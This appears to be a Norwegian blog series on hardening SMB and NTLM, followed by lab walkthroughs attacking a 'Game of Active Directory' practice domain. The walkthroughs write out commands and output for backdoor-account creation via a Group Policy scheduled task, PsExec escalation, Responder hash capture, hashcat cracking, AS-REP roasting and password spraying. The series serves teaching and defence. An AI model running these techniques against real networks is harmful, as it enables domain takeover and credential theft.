Denne artikkelen er første i en serie om herding av SMB-protokollen. Vi sammenligner versjoner og ser på noen av de viktige nyansene og problemstillingene når det kommer til sikkerhet.
SMB-Versjoner
Støtte for signering
Støtte for kryptering
SMB v1.0
Nei
Nei
SMB v2.X
Ja
Nei
SMB v3.X
Ja
Ja
SMBv1 og EternalBlue
I tillegg til at SMBv1 ikke støtter signering eller kryptering er den også svakt designet på flere måter.
Bl.a. kan man opprette en sesjon uten å være autentisert på forhånd. Trusselaktører kan dermed nå SMB-behandlingslogikken direkte over nettverket, og oppnå remote code execution.
Denne svakheten blir kalt MS17-00 også kjent som EternalBlue, og er en av flere exploits i et arsenal av amerikanske cybervåpen, utviklet av en Tailored Access Operations enheten som hører til under National Security Agency (NSA), også kalt The Equation Group.
Denne exploiten ble stjålet av en gruppe som blir kalt The Shadow Brokers, og ble lekket i tidsrommet August 2016 til April 2017, og selv om Microsoft patchet sikkerhetshullet i Mars 2017 ble WannaCry ormen brukt til å infisere store deler av nettet via EternalBlue sårbarheten som mange ikke hadde beskyttet seg mot via patching. Senere i 2017 ble NotPetya sluppet løs, basert på samme sårbarheten.
Fordi SMBv1 er ekstremt sårbar, som ikke er så rart med tanke på at den ble utviklet på sent 80-tall, er det viktig å slå den av i miljøet sitt. Active Directory er skapt for å være kompatibelt langt bakover, og selv nyere installasjoner av Windows Server og Active Directory kan være satt opp til å tillate SMBv1 trafikk.
Dette må eksplisitt nektes i miljøet for å være sikker på at ikke det kan utnyttes.
Kreve Signering
Fra og med SMBv2 og ut ble det mulig å kreve signering av SMB-trafikk. Signeringen gjør det svært vanskelig å utføre relay-angrep dersom både server og klient krever signering.
Her er det viktig å presisere at signering ikke nødvendigvis er påkrevd rett ut av boksen, og må eksplisitt defineres som et krav for å sikre at det håndheves.
Fordi Microsoft har ført en strategi som prioriterer tilgjengelighet over sikkerhet er standardinnstillingene å foretrekke signering, men likevel tillate usignert SMB trafikk dersom motparten ikke støtter det.
Dermed kan en trusselaktør nedgradere sikkerheten ved å si fra sin side at den ikke støtter signering, slik at forhandlingen resulterer i at signering ikke blir brukt.
Slår man på krav om signering vil ikke klient og server kunne bli enige om hvordan de skal kommunisere, med resultat i at sesjonen ikke blir etablert.
Kreve Kryptering
Fra og med versjon 3.0 ble SMB utstyrt med innebygde mekanismer for å kryptere SMB-trafikk. I tidligere versjoner ble trafikken sendt i klartekst, slik at dersom man skulle kryptere trafikken måtte dette gjøres med andre protokoller som innkapslet trafikken, f.eks over IPSec el.l.
Dette er et separat konsept fra signering, og ukryptert trafikk betyr at hele filer – og dermed innholdet i disse filene – kan hentes ut av nettverkstrafikken.
Verktøy som wireshark, tcpdump eller networkminer kan overvåke nettverkstrafikk, og filer kan dras rett ut av pakkestrømmen. Her kan det ligge sensitive filer fra et fileshare ikke alle skal ha tilgang til, eller konfigurasjonsfiler som sendes fra klient til server, og andre ting som ikke må komme på avveie.
Anbefaling
Jeg anbefaler at man skrur av støtte for SMBv1 øyeblikkelig, og at man migrerer over til SMBv2.0 og slår på tvungen signering på kleint og server som et absolutt minstekrav – og aller helst SMB 3.0+ med både tvungen kryptering og signering for å fikse disse sårbarhetene.
Praktiske steg for å gjennomføre dette i Active Directory skal vi se nærmere på i del 2.
Dette blir det første innlegget om NTLM hardening – og handler om historikken og teorien bak hvorfor vi ønsker å se på hardening.
Bakgrunn
Lan Manager
På slutten av 1980-tallet begynte lokale nettverk (LAN) å bli vanlige i bedriftsmiljøer, og det oppsto behov for en felles mekanisme for innlogging og ressursdeling mellom maskiner.
LAN Manager (LM) ble utviklet for å tilby en felles standard for autentisering og tilgangsstyring i slike nettverk, spesielt mellom OS/2- og Windows/MS-DOS systemer.
Protokollen var tilpasset datidens maskinvare og nettverkshastigheter, og prioriterte enkel implementasjon fremfor sterk kryptografi – noe som i ettertid gjorde den svært sårbar:
Alle passord konverteres til store bokstaver
Alle passord var 14 tegn lange. Lengre passord ble kuttet, og kortere passord ble polstret med nuller.
Passordet ble delt i to blokker på 7 tegn hver, som kunne knekkes separat.
Ingen salting. Når et passord først ble knekt ett sted kunne man dele passord og tilsvarende LM-hash, og man visste at dersom man så den hashen i et annet miljø, hadde man også passordet.
Passordblokkene ble brukt til å generere nøkler for å DES-kryptere den samme verdien i alle miljøer: KGS!@#$%
Dette gjør at alle mulige LM-hashede passord uansett lengde i dag knekkes på under et sekund.
Likevel ser vi at LM-hashede passord fortsatt finnes i produksjonsmiljøer i 2025, og at LM-protokollen svært ofte er støttet som autentiseringsmetode.
New Technology Lan Manager
I 1993 lanserte Microsoft Windows NT 3.1, og med dette kom også erstatningen for den gamle LM-protokollen. Arvtageren ble kalt New Technology Lan Manager, eller NTLM. Den implementerte en rekke forbedringer over den gamle LM protokollen.
Man sluttet å konvertere passordet til store bokstaver, og man fikk etter hvert større støtte for tegnsett.
Passordene ble behandlet som en hel streng, ikke delt opp, og den fikk beholde sin lengde.
Man gikk bort fra den gamle 56-bit DES krypteringen i genereringen av passordhashing, og gikk over til å generere en MD4 hash av hele passordet, som resulterte i en såkalt “NT-Hash”.
Man etablerte en challenge-response modell som kan bidra til å hindre replay-angrep der man kunne fange opp autentiseringen og spille den av på nytt for å få tilgang. Denne challenge-response utvekslingen benyttet fortsatt DES til en viss grad.
Det ble innført støtte for en sesjonsnøkkel for å få signering og/eller kryptering av dataene i sesjonen.
Etter hvert ble svakhetene i NTLMv1 tydelige. Protokollen brukte fortsatt DES-baserte operasjoner, og challenge-response mekanismen var fortsatt sårbar for f.eks “pass-the-hash” angrep.
New Technology LAN Manager v2
I 1996 introduserte Microsoft derfor NTLMv2, som beholdt samme grunnleggende modell, men forbedret den kryptografiske styrken betydelig.
NTLMv2 beholdt støtte for eldre systemer, men dette førte også til at mange miljøer fortsatte å være sårbare dersom fallback var aktivert. Dette er fortsatt sant, og et ustrakt problem i 2025.
I stedet for å bare bruke serverens 8-bytes challenge, inkluderte NTLMv2 en klient-generert nonce, et tidsstempel og annen kontekstavhengig informasjon i beregningen. Dette gjorde replay-angrep mye vanskeligere, siden hver autentisering ble unik.
NTLMv2 bruker ikke lenger DES-protokollen i det hele tatt.
Sesjonsnøklene ble generert med protokollen HMAC-MD5, noe som gav økt beskyttelse for “signing” og “sealing” av trafikk i SMB og RPC.
Dog er NTLMv2 heller ikke uten sine svakheter.
Bakoverkompatibilitet med LM og NTLMv1 er ofte aktivert, og signing/sealing er som regel støttet, men ikke påkrevd. Resultatet er at mange domener i praksis kan forhandles ned til svakere moduser.
NTLMv2 bygger fortsatt på den opprinnelige NT-hashen (MD4), som fungerer som nøkkelmateriale i all videre beregning. Det betyr at dersom en angriper får tilgang til NT-hashen, kan de autentisere seg direkte uten å kjenne passordet – det klassiske “pass-the-hash”-angrepet.
Klienten beviser sin identitet overfor serveren, men serveren beviser ikke nødvendigvis sin identitet tilbake. Dette gjør man-in-the-middle-angrep (NTLM relay) mulig.
Selv om sesjonsnøkler finnes, er de ikke kryptografisk bundet til spesifikke forbindelser. Dette gjør at NTLM-relay fortsatt fungerer mellom tjenester som SMB, LDAP, HTTP og RPC, så lenge signering ikke er aktivert eller påkrevd.
En angriper som fanger opp en NTLMv2 challenge–response-utveksling kan fortsatt utføre offline cracking mot passordet. Protokollen bruker ingen salt utover utfordringen, og passordstyrken blir derfor avgjørende. Fordi salting ikke benyttes er identiske passord hashet identisk i alle miljøer.
Autentiseringsflyt
Autentiseringsprosessen i NTLM protokollen er som følger:
NTLM Autentiseringsprosessen fanget opp med Wireshark.
NTLMSSP_NEGOTIATE
NTLMSSP_NEGOTIATE skjer når en klient ønsker å autentisere seg mot en tjeneste på en tjener. I dette tilfellet over SMBv2.
En TCP pakke (SMBv2) sendes til tjenerens port 445 og spør om å etablere en sesjon. Den henvender seg til “Generic Security Service” APIet og ønsker å forhandle detaljer om autentiseringen.Vi ser forhandlingsdetaljene spør om å bruke Extended Session Security, signering, etc.
NTLMSSP_CHALLENGE
Tjeneren utfører sin side av forhandlingen, og sender en utfordring tilbake til klienten, for å bevise sin identitet.
Vi ser server sender et svar tilbake til klienten.
Vi ser dette er en NTLMSSP_CHALLENGE, og vi ser enighet om NTLM versjon, samt en server challenge som klienten må svare på.
I detaljene ser vi klart og tydelig at dette er en “NTLMSSP_Challenge” melding som en del av en “Simple Protected Negotiation”. Vi ser endringer i flaggene Negotiate version, Target Type Domain, og vi ser at det følger med en NTLM Server Challenge som i dette tilfellet er 48415c4e32bae70d.
NTLMSSP_AUTH
Til slutt svarer klienten på challenge, vi ser signering er på, men ikke påkrevd. Dette betyr at vi kunne nedgradert sikkerheten noe. Vi ser også at SMB kryptering ikke er påslått, så trafikken over denne kanalen sendes i klartekst og eventuelle filoverføringer el.l. vil potensielt kunne fanges opp, og filer dumpes rett ut av en trafikklogg.Vi ser dette er en NTLMSSP_AUTH melding, og den inneholder en NTLMv2 response, med tidsstempel, client challenge, etc. Denne informasjonen sammen med kontoens passordhash og server challenge hashes og sendes som svar tilbake til server for å etablere en autentisert sesjon.
Game of Active Directory del 3.2 – Persistence Privilege escalation & Lateral Movement fortsetter
Forord: Denne bloggserien viser reelle metoder angripere bruker for å bevege seg inn i, og ta over et AD miljø. All denne informasjonen er allerede offentlig tilgjengelig, og deles ikke for å gi grunnkurs i nettkriminalitet, men for å spre kunnskap om hvorfor vi må beskytte oss. Du må kun benytte disse verktøyene, metodene og prosedyrene i miljøer der du har fått eksplisitt samtykke av eier til å gjøre dette.
I forrige post anskaffet vi oss full kontroll over hele North subdomenet i sevenkingdoms.local AD-skogen. I denne posten skal vi ta over hele sevenkingdoms.local med mange av de samme MITRE ATT&CK teknikkene, og noen få nye, bl.a: T1484.001 – Group Policy Modification.
Active Directory Users and Computers
Vi er allerede inne som Backdoor Stark på Winterfell, og kan åpne server manager og kjøre Active Directory Users and Computers (ADUC) som domeneadministrator.
Som standard får vi opp domenet north.sevenkingdoms.local men vi ønsker å se hva vi kan finne i sevenkingdoms.local så vi bytter domenekontekst
Vi bytter kontekst til sevenkingdoms.local for å utforske AD miljøet i hoveddomenet.
Vi blar litt rundt, og noterer oss at kontoen daenerys.targaryen ligger i en OU som heter AcrossTheNarrowSea og tilhører domenet ESSOS. Dette kan kanskje være nyttig i fremtiden, selv om det ikke er helt relevant akkurat nå.
ESSOS\Daenerys.Targaryen eksisterer i sevenkingdoms.local, det er interessant.
Vi bemerker oss at Kingslanding DCen befinner seg i default-first-site-name sammen med Winterfell DCen.
Både Kingslanding og Winterfell befinner seg i default-first-site-name.
Dersom vi kan linke en group policy til default-first-site-name kan vi tvinge kjøring av vilkårlig kode i sevenkingdoms.local og få et solid fotfeste i hele AD-skogen.
Group Policy Management
Vi fyrer opp Group Policy Management og ser litt på group policies. Vi har domeneadmin rettigheter allerede så vi kan opprette egne, men vi finner en policy som heter StarkWallpaper som vi faktisk kunne brukt fra starten av når vi fant Samwell.Tarly sitt passord i rekognoseringsfasen dersom vi hadde ønsket det, ettersom han har mange rettigheter på policyobjektet.
Samwell Tarly og Domain Administrator har full kontroll på GPOen StarkWallpaper.
Vi modifiserer StarkWallpaper til å opprette en planlagt oppgave som skal kjøre så fort policyen treffer en maskin.
GPO -> Edit -> Computer Configuration -> Control Panel Settings -> Scheduled Tasks -> New Immediate Task (At least Windows 7)
Vi kaller den “Open Sesame”, og setter den til å kjøre som NT Authority\System enten bruker er logget inn eller ei, og at den skal kjøre i høyeste privilegienivå.
Under handlinger oppretter vi først en handling som lager en ny bruker ved navn backdoor.baratheon med passordet hail2theking
C:\Windows\System32\net.exe user backdoor.baratheon hail2theking /add
Planlagt oppgave: opprette ny lokal bruker backdoor.baratheon med passord hail2theking
Deretter skal bobby.baratheon legges til i administrators slik at vi får lokale adminrettigheter på maskinen den kjører på.
Planlagte oppgaver: Opprette ny lokal bruker, og melde ny bruker inn i lokaladmin gruppen.
Neste steg er å koble policyen til default-first-site-name og å fremprovosere kjøring i sevenkingdoms.local, men får vi til det?
Vi begynner med å inkludere Default-First-Site-Name i visningen i group policy management under sites.
Vi får sett siten, men vi får ikke lov til å linke policyer som brukeren backdoor.stark.
Link an Existing GPO… er grået ut for NORTH\backdoor.stark på Default-First-Site-Name
Sites and Services
Finnes det kontoer med redigeringsrettigheter? La oss åpne Active Directory Sites and Services for å ta en titt.
Vi ser at Domain Admins og Enterprise Admins i sevenkingdoms.local har rettighetene – men vi har ikke kontroll over noen av disse brukerene enda (se bort fra T.L passordet vi fant tidligere som vi kunne brukt). Men SYSTEM som er en lokal konto har også Write tilgang på Default-First-Site-Name objektet.
SYSTEM har skriverettigheter på Default-First-Site-Name og kan dermed linke GPOer her.
PSExec
Vi laster opp SysInternals verktøyet PSExec64.exe til C:\tmp på Winterfell, og åpner et powershell-vindu med adminrettigheter for å starte psexec som admin.
PS C:\tmp> .\PsExec64.exePsExec v2.43- Execute processes remotelyCopyright (C)2001-2023 Mark RussinovichSysinternals -www.sysinternals.comPsExec executes a program on a remote system,where remotely executed consoleapplications execute interactively.Usage: psexec [\\computer[,computer2[,...]|@file]][-uuser[-ppsswd]][-ns][-rservicename][-h][-l][-s|-e][-x][-i[session]][-c[-f|-v]][-wdirectory][-d][-<priority>][-gn][-an,n,...][-verbose] cmd [arguments]-a Separate processors on which the application can run with commas where1 is the lowest numbered CPU. For example, to run the application on CPU 2 and CPU 4, enter:"-a 2,4"-c Copy the specified program to the remote system for execution. If you omit this option the application must be in the system path on the remote system.-d Don't wait for process to terminate (non-interactive). -e Does not load the specified account's profile.-f Copy the specified program even if the file already exists on the remote system.-g Set the primary thread's processor group to the one specified (Only for systems with more than 64 processors). -i Run the program so that it interacts with the desktop of the specified session on the remote system. If no session is specified the process runs in the console session. -h If the target system is Vista or higher, has the process run with the account's elevated token,if available.-l Run process as limited user (strips the Administrators group and allows only privileges assigned to the Users group). On Windows Vista the process runs with Low Integrity.-n Specifies timeout in seconds connecting to remote computers.-p Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password.-r Specifies the name of the remote service to create or interact. with.-s Run the remote processin the System account.-u Specifies optional user name for login to remote computer.-v Copy the specified file only if it has a higher version number or is newer on than the one on the remote system.-w Set the working directory of the process(relative to remote computer).-x Display the UI on the Winlogon secure desktop (local system only).-arm Specifies the remote computer is of ARM architecture.-priority Specifies -low,-belownormal,-abovenormal,-high or-realtime to run the process at a different priority. Use-background to run at low memory and I/O priority on Vista. computer Direct PsExec to run the application on the remote computer or computers specified. If you omit the computer name PsExec runs the application on the local system, and if you specify a wildcard (\\*), PsExec runs the command on all computers in the current domain.@file PsExec will execute the command on each of the computers listedin the file. cmd Name of application to execute. arguments Arguments to pass (note that file paths must be absolute paths on the target system).-accepteula This flag suppresses the display of the license dialog.-nobanner Do not display the startup banner and copyright message.
Vi kjører psexec med flaggene -s for å kjøre som System, -i for å kjøre console og -d så ikke den trenger å vente på at sesjonen tar slutt, og ber den starte cmd.exe
PS C:\tmp> .\PsExec64.exe-s -i -d cmd.exePsExec v2.43- Execute processes remotelyCopyright (C)2001-2023 Mark RussinovichSysinternals -www.sysinternals.comcmd.exe started on WINTERFELL with process ID 2648.
Nå har vi et cmd.exe shell kjørende som nt authority\system på Winterfell DC-en. La oss kjøre en ny instans av Server Manager i denne konteksten, åpne group policy manager og sjekke om vi kan linke GPOer til Default-First-Site-Name nå.
Vi ser at “Link an existing GPO…” er klikkbar nå som vi kjører Group Policy Manager som NT Authority\System
Det får vi lov til, og vi linker StarkWallpaper GPOen her. Med det gjort ønsker vi nå å endre på security filtering, slik at den treffer domenekontrolleren Kingslanding i sevenkingdoms.local
Security Filtering: scopet mot KINGSLANDING$ i sevenkingdoms.local istedenfor Authenticated Users i north.sevenkingdoms.local
Verifisering
Vi scanner kjapt med NetExec for å se om vi får tilgang over RDP med backdoor.baratheon og passord hail2theking, og kan bekrefte at den har kjørt på både Winterfell og på Kingslanding, og at vi nå eier domenekontrolleren i sevenkingdoms.local
$netexecrdp10.3.2.10-30-ubackdoor.baratheon-phail2thekingRDP10.3.2.113389WINTERFELL [*] Windows 10 or Windows Server 2016 Build 17763 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(nla:True)RDP10.3.2.103389KINGSLANDING [*] Windows 10 or Windows Server 2016 Build 17763 (name:KINGSLANDING)(domain:sevenkingdoms.local)(nla:True)RDP10.3.2.223389CASTELBLACK [*] Windows 10 or Windows Server 2016 Build 17763 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(nla:True)RDP10.3.2.123389MEEREEN [*] Windows 10 or Windows Server 2016 Build 14393 (name:MEEREEN)(domain:essos.local)(nla:True)RDP10.3.2.233389BRAAVOS [*] Windows 10 or Windows Server 2016 Build 14393 (name:BRAAVOS)(domain:essos.local)(nla:True)RDP10.3.2.113389WINTERFELL [+] north.sevenkingdoms.local\backdoor.baratheon:hail2theking (Pwn3d!)RDP10.3.2.103389KINGSLANDING [+] sevenkingdoms.local\backdoor.baratheon:hail2theking (Pwn3d!)RDP10.3.2.223389CASTELBLACK [+] north.sevenkingdoms.local\backdoor.baratheon:hail2theking RDP10.3.2.123389MEEREEN [-] essos.local\backdoor.baratheon:hail2theking (STATUS_LOGON_FAILURE)RDP10.3.2.233389BRAAVOS [-] essos.local\backdoor.baratheon:hail2theking (encoded_datamustbeabytestring,notNoneType)Runningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Vi lykkes med å logge på kingslanding DCen i sevenkingdoms.local som backdoor.baratheon og vi har full admintilgang – også i domenet.
Vi kan f.eks elevere oss selv til Enterprise Admin i skogen via ADUC
Vi legger oss selv til som Enterprise Admin
Herfra kan vi se om det er noen spennende måter å få fotfeste i Essos.local domenet, som er det vi skal ta for oss i neste innlegg.
Refleksjon
Som vi så var det en smal sak å forflytte seg fra et underdomene til et overordnet domene når man allerede hadde kontroll over en domenekontroller, og kontrollerene i begge strukturene delte samme site. Dette er en sårbar standardkonfigurasjon i Active Directory veldig mange ikke er klar over, og kan utnyttes for å bryte hele skogen når man først har fått et solid feste i ett av domenene.
Vi har funnet andre indikatorer på at ting ikke er som de skal, vi kunne enumerere objekter i sevenkingdoms.local via robb.stark i north.sevenkingdoms.local, og vi fant et passordhint for en konto “T.L” som ikke befinner seg i north.
Det er også mange flere sårbarheter men jeg ønsker ikke å kartlegge absolutt alle i denne serien, det er kun ment for å vise hvordan jeg valgte å løse det, slik at andre kan se hvor alvorlige konsekvensene kan være dersom man har slike svakheter i Active Directory miljøene sine.
Jeg føler ikke noe enormt tidspress med å gi ut råd om hvordan man tetter disse hullene ettersom alle verktøyene og teknikkene har vært ute i mange år allerede, og jeg tror det er i hovedsak administratorer som bør eksponeres for lavterskel-angrep som detet for å få øynene opp for hvor viktig det er å ta en ordentlig gjennomgang av identitetsmiljøet sitt.
Det er nemmelig slik i 2025 at trusselaktørene foretrekker å logge seg inn, ikke bryte seg inn.
Forord: Denne bloggserien viser reelle metoder angripere bruker for å bevege seg inn i, og ta over et AD miljø. All denne informasjonen er allerede offentlig tilgjengelig, og deles ikke for å gi grunnkurs i nettkriminalitet, men for å spre kunnskap om hvorfor vi må beskytte oss. Du må kun benytte disse verktøyene, metodene og prosedyrene i miljøer der du har fått eksplisitt samtykke av eier til å gjøre dette.
I dette segmentet tar vi for oss “initial access” på systemer. Vi fokuserer på MITRE ATT&CK T1078.002 – Valid Accounts: Domain Accounts. Selv om vi allerede har passordet til Sam og hint om Arya, så skal vi utforske flere metoder i denne posten.
Responder
Dersom miljøet benytter NTLM-autentisering kan vi forsøke å stjele NTLM hasher fra nettverket. Disse kan man enten cracke offline for å finne kontopassordet. I mange tilfeller kan vi også utnytte en klassisk sårbarhet, og utføre såkalte relay-angrep der vi videresender hashen til en tjeneste uten å kunne passordet, og likevel kan vi bli autentisert som den kontoen mot en tjeneste.
Ettersom vi befinner oss på samme L2 broadcast domain som labben, kan vi kjøre et verktøy som heter Responder for å se om vi kan finne noen hasher.
$sudoresponder-Ivxlan100--analyze[+] Listening for events...[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned
Forsøker vi å cracke disse to oppfangede hashene med rockyou ordlista, ser vi at dette ikke lykkes for eddard.stark kontoen.
$hashcat-m5600creds/eddard.stark.north.sevenkingdoms.local.ntlmv2/usr/share/wordlists/rockyou.txthashcat (v6.2.6) startingOpenCLAPI (OpenCL 3.0PoCL6.0+debianLinux,None+Asserts,RELOC,SPIR-V,LLVM18.1.8,SLEEF,DISTRO,POCL_DEBUG) - Platform #1 [The pocl project]====================================================================================================================================================Minimumpasswordlengthsupportedbykernel:0Maximumpasswordlengthsupportedbykernel:256Hashes:1digests;1uniquedigests,1uniquesaltsBitmaps:16bits,65536entries,0x0000ffffmask,262144bytes,5/13rotatesRules:1Optimizersapplied:* Zero-Byte* Not-Iterated* Single-Hash* Single-SaltATTENTION!Pure (unoptimized) backend kernels selected.Purekernelscancracklongerpasswords,butdrasticallyreduceperformance.Ifyouwanttoswitchtooptimizedkernels,append-Otoyourcommandline.Seetheabovemessagetofindoutabouttheexactlimits.Watchdog:Temperatureaborttriggersetto90cHostmemoryrequiredforthisattack:1MBDictionarycachehit:* Filename..: /usr/share/wordlists/rockyou.txt* Passwords.: 14344385* Bytes.....: 139921507* Keyspace..: 14344385Crackingperformancelowerthanexpected?* Append -O to the commandline.Thislowersthemaximumsupportedpassword/saltlength (usually downto32).* Append -w 3 to the commandline.Thiscancauseyourscreentolag.* Append -S to the commandline.Thishasadrasticspeedimpactbutcanbebetterforspecificattacks.Typicalscenariosareasmallwordlistbutalargeruleset.* Update your backend API runtime / driver the right way:https://hashcat.net/faq/wrongdriver* Create more work items to make use of your parallelization power:https://hashcat.net/faq/moreworkApproachingfinalkeyspace-workloadadjusted.Session..........:hashcatStatus...........:ExhaustedHash.Mode........:5600 (NetNTLMv2)Hash.Target......:EDDARD.STARK::NORTH:1122334455667788:4162288f6fae16...000000Time.Started.....:MonSep2214:06:272025 (12 secs)Time.Estimated...:MonSep2214:06:392025 (0 secs)Kernel.Feature...:PureKernelGuess.Base.......:File (/usr/share/wordlists/rockyou.txt)Guess.Queue......:1/1 (100.00%)Speed.#1.........:916.2kH/s (1.82ms) @ Accel:512 Loops:1 Thr:1 Vec:8Recovered........:0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)Progress.........:14344385/14344385 (100.00%)Rejected.........:0/14344385 (0.00%)Restore.Point....:14344385/14344385 (100.00%)Restore.Sub.#1...:Salt:0Amplifier:0-1Iteration:0-1Candidate.Engine.:DeviceGeneratorCandidates.#1....:$HEX[206b72697374656e616e6e65] ->$HEX[042a0337c2a156616d6f732103]Hardware.Mon.#1..:Util:67%Started:MonSep2214:06:262025Stopped:MonSep2214:06:412025
Prøver vi derimot med robb.stark ser vi at vi finner passordet meget raskt. For å korte ned litt tar jeg ikke med alt av output fra hashcat, men vi ser på slutten her at passordet til robb.stark er “sexywolfy”.
Vi har allerede den tilgangen vi trenger, egentlig, men vi ønsker også å se på andre sårbarheter.
AS-Rep Roasting
Et eksempel kan være å sjekke om vi kan AS-REP roaste brukerkontoer i lista vi fikk fra enum4linux i recon fasen.
AS-REP eller “Authentication Server Response” kan utnyttes dersom en konto er flagget “UF_DONT_REQUIRE_PREAUTH”.
Hvem som helst med nettverkstilgang vil kunne be om en såkalt “Ticket Granting Ticket” (TGT) fra Kerberos Key Distribution Center (KDC). Denne billetten (TGT) kan man bruke til å skaffe tjenestebilletter for å logge seg på gitte tjenester, som f.eks fileshares, remote desktop, el.l – men er kryptert med kontoens passord. Dermed kan vi forsøke å cracke passordet med et ordliste angrep, mot en kryptert TGT.
└─$GetNPUsers.py-usersfilecreds/userlist.north.sevenkingdoms.local-request-formathashcat-outputfilecreds/north.asrep-dc-ip10.3.2.11'NORTH/'[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)[-] User SEVENKINGDOMS$ doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set$krb5asrep$23$brandon.stark@NORTH:973db4ba589726bc964c68c804b487ce$d84f141daf8038225860954b00aee0578224ba0f052d99f0e575b0197f375f577d801bd6bb4784aa2d1d14693e8c7feb52331d1f97ce47cbd81f3114bcd88153e5fc492a6b9a42643043cae5cb79387b6d7f788d58fce52495b72c48c537668e8cb2d35c96117fb49f34ced19a3a39ff5552d9d0ef1ba74f8d022fe47b524b76b49da7e354a36588efa4e594fb0343a231c1702acd088c351280174df0963386635d2f43a8a249db4070e778185e08e73032856d523f68f2bf0028db72199fd145544ad180d3095126332b2d63acee31c6ce395be66ea84159371229c92f9f425e0bf5a126974d86d2c06919475f69965297[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
Vi har altså klart å AS-REP roaste brukeren til NORTH\Brandon.Stark, noe som innebærer at vi har fått tak i en kerberos ticket kryptert med hans passord. Det betyr at vi kan forsøke å cracke passordet til denne kontoen.
Password spraying
Videre kan vi forsøke å gjette passord mot kontoer. Det er ikke helt uvanlig at brukernavn = passord, som f.eks i admin/admin standardpålogginger og lignende.
─$forpin$(cat creds/userlist.north.sevenkingdoms.local);donetexecsmb10.3.2.0/24-u$p-p$p;doneRunningnxcagainst256targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.12445MEEREEN [-] essos.local\hodor:hodor STATUS_LOGON_FAILURESMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMB>SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False>SMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)>SMB10.3.2.23445BRAAVOS [+] essos.local\hodor:hodor (Guest)SMB10.3.2.10445KINGSLANDING [-] sevenkingdoms.local\hodor:hodor STATUS_LOGON_FAILURESMB10.3.2.22445CASTELBLACK [+] north.sevenkingdoms.local\hodor:hodorSMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\hodor:hodor
Som vi ser er hodor:hodor akseptert på winterfell og castelblack, men på braavos har vi kun gjestetilgang, fordi han eksisterer ikke i essos\ domenet.
Tidligere fikk vi også et hint om at NORTH\arya.stark sitt passord kanskje kunne være “Needle”.
$netexecsmb--shares10.3.2.10-30-u"arya.stark"-p"Needle"SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.10445KINGSLANDING [-] sevenkingdoms.local\arya.stark:Needle STATUS_LOGON_FAILURE SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\arya.stark:Needle SMB10.3.2.22445CASTELBLACK [+] north.sevenkingdoms.local\arya.stark:Needle SMB10.3.2.23445BRAAVOS [+] essos.local\arya.stark:Needle (Guest)SMB10.3.2.12445MEEREEN [-] essos.local\arya.stark:Needle STATUS_LOGON_FAILURE SMB10.3.2.11445WINTERFELL [*] Enumerated sharesSMB10.3.2.11445WINTERFELLSharePermissionsRemarkSMB10.3.2.11445WINTERFELL----------------------SMB10.3.2.11445WINTERFELLADMIN$ RemoteAdminSMB10.3.2.11445WINTERFELLC$ DefaultshareSMB10.3.2.11445WINTERFELLIPC$ READRemoteIPCSMB10.3.2.11445WINTERFELLNETLOGONREADLogonservershareSMB10.3.2.11445WINTERFELLSYSVOLREADLogonservershareSMB10.3.2.22445CASTELBLACK [*] Enumerated sharesSMB10.3.2.22445CASTELBLACKSharePermissionsRemarkSMB10.3.2.22445CASTELBLACK----------------------SMB10.3.2.22445CASTELBLACKADMIN$ RemoteAdminSMB10.3.2.22445CASTELBLACKallREAD,WRITEBasicRWshareforallSMB10.3.2.22445CASTELBLACKC$ DefaultshareSMB10.3.2.22445CASTELBLACKIPC$ 